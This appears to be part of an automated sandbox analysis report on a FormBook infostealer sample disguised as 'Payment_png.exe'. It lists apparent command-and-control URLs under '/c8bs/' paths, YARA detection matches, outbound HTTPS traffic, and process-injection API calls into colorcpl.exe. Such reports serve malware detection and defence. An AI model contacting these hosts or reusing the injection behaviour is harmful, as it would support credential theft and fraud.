Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.booksfall.com/c8bs/www.pcpartout.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.booksfall.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.bostonm.info
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.bostonm.info/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.bostonm.info/c8bs/www.quantify-co.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.bostonm.infoReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.broskiusa.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.broskiusa.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.broskiusa.com/c8bs/www.aainakari.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.broskiusa.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.choupisson.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.choupisson.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.choupisson.com/c8bs/www.uforservice.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.choupisson.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi39.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi39.net/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi39.net/c8bs/www.accinf5.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi39.netReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domentemenegi42.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domentemenegi42.net/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domentemenegi42.net/c8bs/www.broskiusa.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.domentemenegi42.netReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.loversdeal.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.loversdeal.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.loversdeal.com/c8bs/www.booksfall.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.loversdeal.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpartout.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpartout.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpartout.com/c8bs/www.birkenhof-allgaeu.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpartout.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.plowbrothers.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.plowbrothers.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.plowbrothers.com/c8bs/www.slutefuter.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.plowbrothers.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.quantify-co.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.quantify-co.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.quantify-co.com/c8bs/M
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.quantify-co.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.silverdollarcafe.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.silverdollarcafe.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.silverdollarcafe.com/c8bs/www.domentemenegi42.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.silverdollarcafe.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.slutefuter.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.slutefuter.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.slutefuter.com/c8bs/www.loversdeal.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.slutefuter.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.uforservice.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.uforservice.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.uforservice.com/c8bs/www.domennyarendi39.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.uforservice.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown

HTTPS traffic detected: 170.249.199.106:443 -> 192.168.2.3:49714 version: TLS 1.2

Source: C:\Windows\explorer.exe

Code function: 6_2_06136EB2 OpenClipboard,

6_2_06136EB2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Payment_png.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Payment_png.exe

Source: C:\Users\user\Desktop\Payment_png.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02220438 EnumWindows,NtSetInformationThread,	0_2_02220438
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02224EE8 NtProtectVirtualMemory,	0_2_02224EE8
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02225331 NtMapViewOfSection,	0_2_02225331
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02220F83 NtWriteVirtualMemory,LoadLibraryA,	0_2_02220F83
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02222992 NtSetInformationThread,	0_2_02222992
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221E27 NtWriteVirtualMemory,	0_2_02221E27
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_0222542F NtMapViewOfSection,	0_2_0222542F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02222033 NtWriteVirtualMemory,	0_2_02222033
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022220A1 NtWriteVirtualMemory,	0_2_022220A1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022204AF NtSetInformationThread,	0_2_022204AF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221AB4 NtWriteVirtualMemory,	0_2_02221AB4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221E81 NtWriteVirtualMemory,	0_2_02221E81
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022254F5 NtMapViewOfSection,	0_2_022254F5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022254CB NtMapViewOfSection,	0_2_022254CB
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022204D5 NtSetInformationThread,	0_2_022204D5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221F21 NtWriteVirtualMemory,	0_2_02221F21
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02225338 NtMapViewOfSection,	0_2_02225338
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02225301 NtMapViewOfSection,	0_2_02225301
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221369 NtWriteVirtualMemory,	0_2_02221369
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02225544 NtMapViewOfSection,	0_2_02225544
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022253B4 NtMapViewOfSection,	0_2_022253B4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02222183 NtWriteVirtualMemory,	0_2_02222183
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02225380 NtMapViewOfSection,	0_2_02225380
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221986 NtSetInformationThread,NtWriteVirtualMemory,	0_2_02221986
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221F93 NtWriteVirtualMemory,	0_2_02221F93
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_02221DEB NtWriteVirtualMemory,	0_2_02221DEB
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 0_2_022253EF NtMapViewOfSection,	0_2_022253EF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_1E3E9660
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_1E3E96E0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,	2_2_1E3E9710
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_1E3E97A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,	2_2_1E3E9780
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9FE0 NtCreateMutant,LdrInitializeThunk,	2_2_1E3E9FE0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9540 NtReadFile,LdrInitializeThunk,	2_2_1E3E9540
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E95D0 NtClose,LdrInitializeThunk,	2_2_1E3E95D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,	2_2_1E3E9A20
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_1E3E9A00
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,	2_2_1E3E9A50
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_1E3E9860
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,	2_2_1E3E9840
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_1E3E98F0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_1E3E9910
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,	2_2_1E3E99A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9610 NtEnumerateValueKey,	2_2_1E3E9610
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9670 NtQueryInformationProcess,	2_2_1E3E9670
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9650 NtQueryValueKey,	2_2_1E3E9650
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E96D0 NtCreateKey,	2_2_1E3E96D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9730 NtQueryVirtualMemory,	2_2_1E3E9730
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3EA710 NtOpenProcessToken,	2_2_1E3EA710
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3EA770 NtOpenThread,	2_2_1E3EA770
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9770 NtSetInformationFile,	2_2_1E3E9770
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9760 NtOpenProcess,	2_2_1E3E9760
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3EAD30 NtSetContextThread,	2_2_1E3EAD30
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9520 NtWaitForSingleObject,	2_2_1E3E9520
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9560 NtWriteFile,	2_2_1E3E9560
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E95F0 NtQueryInformationFile,	2_2_1E3E95F0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9A10 NtQuerySection,	2_2_1E3E9A10
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9A80 NtOpenDirectoryObject,	2_2_1E3E9A80
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9B00 NtSetValueKey,	2_2_1E3E9B00
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3EA3B0 NtGetContextThread,	2_2_1E3EA3B0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9820 NtEnumerateKey,	2_2_1E3E9820
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3EB040 NtSuspendThread,	2_2_1E3EB040
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E98A0 NtWriteVirtualMemory,	2_2_1E3E98A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E9950 NtQueueApcThread,	2_2_1E3E9950
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E99D0 NtCreateProcessEx,	2_2_1E3E99D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00565331 NtSetInformationThread,	2_2_00565331
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00564EE8 NtProtectVirtualMemory,	2_2_00564EE8
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00565301 NtSetInformationThread,	2_2_00565301
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00565338 NtSetInformationThread,	2_2_00565338
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_005653EF NtSetInformationThread,	2_2_005653EF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00565380 NtSetInformationThread,	2_2_00565380
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_005653B4 NtSetInformationThread,	2_2_005653B4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_0056542F NtSetInformationThread,	2_2_0056542F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_005654CB NtSetInformationThread,	2_2_005654CB
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_005654F5 NtSetInformationThread,	2_2_005654F5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00565544 NtSetInformationThread,	2_2_00565544
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C495D0 NtClose,LdrInitializeThunk,	14_2_04C495D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49540 NtReadFile,LdrInitializeThunk,	14_2_04C49540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C496D0 NtCreateKey,LdrInitializeThunk,	14_2_04C496D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C496E0 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_04C496E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49650 NtQueryValueKey,LdrInitializeThunk,	14_2_04C49650
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49660 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_04C49660
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49FE0 NtCreateMutant,LdrInitializeThunk,	14_2_04C49FE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49780 NtMapViewOfSection,LdrInitializeThunk,	14_2_04C49780
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49710 NtQueryInformationToken,LdrInitializeThunk,	14_2_04C49710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49840 NtDelayExecution,LdrInitializeThunk,	14_2_04C49840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49860 NtQuerySystemInformation,LdrInitializeThunk,	14_2_04C49860
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C499A0 NtCreateSection,LdrInitializeThunk,	14_2_04C499A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49910 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_04C49910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49A50 NtCreateFile,LdrInitializeThunk,	14_2_04C49A50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C495F0 NtQueryInformationFile,	14_2_04C495F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49560 NtWriteFile,	14_2_04C49560
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49520 NtWaitForSingleObject,	14_2_04C49520
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C4AD30 NtSetContextThread,	14_2_04C4AD30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49670 NtQueryInformationProcess,	14_2_04C49670
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49610 NtEnumerateValueKey,	14_2_04C49610
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C497A0 NtUnmapViewOfSection,	14_2_04C497A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49760 NtOpenProcess,	14_2_04C49760
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C4A770 NtOpenThread,	14_2_04C4A770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49770 NtSetInformationFile,	14_2_04C49770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C4A710 NtOpenProcessToken,	14_2_04C4A710
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49730 NtQueryVirtualMemory,	14_2_04C49730
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C498F0 NtReadVirtualMemory,	14_2_04C498F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C498A0 NtWriteVirtualMemory,	14_2_04C498A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C4B040 NtSuspendThread,	14_2_04C4B040
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49820 NtEnumerateKey,	14_2_04C49820
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C499D0 NtCreateProcessEx,	14_2_04C499D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49950 NtQueueApcThread,	14_2_04C49950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49A80 NtOpenDirectoryObject,	14_2_04C49A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49A00 NtProtectVirtualMemory,	14_2_04C49A00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49A10 NtQuerySection,	14_2_04C49A10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49A20 NtResumeThread,	14_2_04C49A20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C4A3B0 NtGetContextThread,	14_2_04C4A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C49B00 NtSetValueKey,	14_2_04C49B00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_009681C0 NtCreateFile,	14_2_009681C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_009682F0 NtClose,	14_2_009682F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00968270 NtReadFile,	14_2_00968270
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_009683A0 NtAllocateVirtualMemory,	14_2_009683A0

Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C6E30	2_2_1E3C6E30
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46D616	2_2_1E46D616
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E472EF7	2_2_1E472EF7
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E47DFCE	2_2_1E47DFCE
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E471FF1	2_2_1E471FF1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46D466	2_2_1E46D466
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B841F	2_2_1E3B841F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB477	2_2_1E3CB477
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464496	2_2_1E464496
